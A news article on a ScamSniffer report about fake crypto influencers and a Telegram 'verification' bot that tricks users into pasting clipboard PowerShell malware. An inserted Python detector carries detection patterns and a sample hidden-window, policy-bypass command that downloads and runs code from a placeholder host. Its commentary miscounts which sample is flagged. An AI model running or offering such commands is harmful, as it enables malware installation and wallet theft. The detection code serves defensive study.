Scam Sniffer warns of fake Influencers and Telegram bots spreading crypto-malware

Bad actors deploy cryptocurrency-stealing malware using a sophisticated combination of fake X accounts and malicious Telegram bots.

Web3 security company ScamSniffer has warned of a new scam targeting cryptocurrency users by imitating popular influencers in the space and emptying their wallets using stealth malware.

The attack begins when scammers create fake X accounts posing as popular cryptocurrency influencers and promoting Telegram groups that promise to offer investment advice. These groups are often presented as “exclusive” and are usually promoted under the posts of influencers that scammers impersonate to make them appear legitimate.

When unsuspecting users join the group via the invite link, they are asked to verify themselves through a Telegram verification bot called “OfficialSafeguardBot” which, according to ScamSniffer, “creates artificial urgency” by giving users very little time to complete the captcha.

During this fake verification process, the bot injects “malicious PowerShell code” (PowerShell is a scripting language used for automating tasks in Windows) into the victim’s clipboard. Victims are then told to open the Windows Run dialog and paste in what the bot placed there, presented as a required step to complete the verification process. See below.

[Image: Telegram verification bot prompting users to execute malicious code. Source: ScamSniffer]
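The lure described above relies on a victim pasting attacker-supplied text into the Run dialog, so a useful defensive control is to inspect text before it gets that far: the clipboard, the RunMRU history that Windows keeps for the Run dialog, or PowerShell script-block logs. The following is an added example, not code from ScamSniffer or from the report; it scores a piece of text for the hallmarks of such a lure (hidden window, policy bypass, download-and-execute cradles, encoded commands, captcha wording). The indicator list, weights and threshold are assumptions chosen for illustration, and every sample input is constructed with placeholder, non-routable hosts.

```python
"""
Added example (not part of the ScamSniffer report): score text for the
hallmarks of a "paste this into the Windows Run dialog" lure. It can be run
over clipboard contents, RunMRU entries or PowerShell script-block log lines.
Indicators, weights and threshold are illustrative assumptions.
"""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are illustrative, not a vendor's rule set.
INDICATORS = [
    ("powershell_invocation", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 3),
    ("bypass_policy", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 3),
    # -enc / -EncodedCommand followed by a long base64 blob
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 5),
    ("download_cradle", re.compile(r"(iwr|invoke-webrequest|downloadstring|net\.webclient|curl)", re.I), 3),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I), 4),
    ("lolbin", re.compile(r"\b(mshta|bitsadmin|certutil)\b", re.I), 3),
    # Lures often append "I am not a robot" / "verification" so the pasted
    # text looks like a captcha step in the Run dialog.
    ("captcha_lure", re.compile(r"(i am not a robot|verification|captcha)", re.I), 2),
]

THRESHOLD = 6  # assumption: tune against your own logs


@dataclass
class Verdict:
    score: int
    matched: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def analyse(text: str) -> Verdict:
    """Score one piece of text (clipboard content, RunMRU entry, log line)."""
    matched = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in matched)
    return Verdict(score, matched)


def scan_lines(lines):
    """Return (index, Verdict) for each line that crosses the threshold."""
    hits = []
    for i, line in enumerate(lines):
        verdict = analyse(line)
        if verdict.suspicious:
            hits.append((i, verdict))
    return hits


# Constructed sample entries, in the shape of a Run dialog history. The hosts
# are placeholders and the commands are not taken from any real incident.
SAMPLE_LINES = [
    "notepad.exe",
    "powershell Get-ChildItem C:\\Users",
    "powershell -w hidden -ep bypass -c \"iwr hxxp://placeholder.invalid/verify | iex\""
    "  # 'I am not a robot' verification",
    "powershell -NoProfile -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
]

if __name__ == "__main__":
    for idx, verdict in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: score={verdict.score} indicators={verdict.matched}")
```

The second sample scores well above the threshold because it stacks every trait the report describes: a hidden PowerShell window, an execution-policy bypass, a web download piped straight into Invoke-Expression, and captcha wording meant to make the paste look like a verification step. A plain `powershell Get-ChildItem` scores only one point, which is the reason for scoring combinations rather than alerting on PowerShell alone.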

According to ScamSniffer, there have been “recently numerous cases” where similar tactics were used to steal a user’s private keys. The malware also managed to bypass several antiviruses, with only VirusTotal reporting it as malicious.

To protect themselves, ScamSniffer advises users to use hardware wallets, avoid running unknown commands and avoid installing unverified software.

The report follows a previous ScamSniffer warning in December about an increase in fake X accounts. Notably, impersonation accounts have increased by more than 87% since November, and two victims lost more than $3 million after clicking malicious links promoted through some of these accounts.

In recent months, threat actors have increasingly used malware designed to drain crypto assets. This rise coincides with Bitcoin’s rally to $100,000 and a broader rise in altcoins, making the crypto sector increasingly lucrative for scammers.

On December 9, Cado Security Labs reported that Realst malware was infiltrating users’ systems using a fake meeting app after tricking them into believing they needed to download the app for a legitimate business opportunity or an interaction with a trusted contact.

Once deployed, the malware steals crypto assets, credentials stored in the browser, bank card details and other sensitive information.

In October, decentralized finance protocol Radiant Capital lost more than $50 million after the systems of some platform developers were compromised via a compressed PDF file containing malware. The attack involved social engineering, with the infected file promoted via Telegram by an attacker posing as a former trusted contractor.
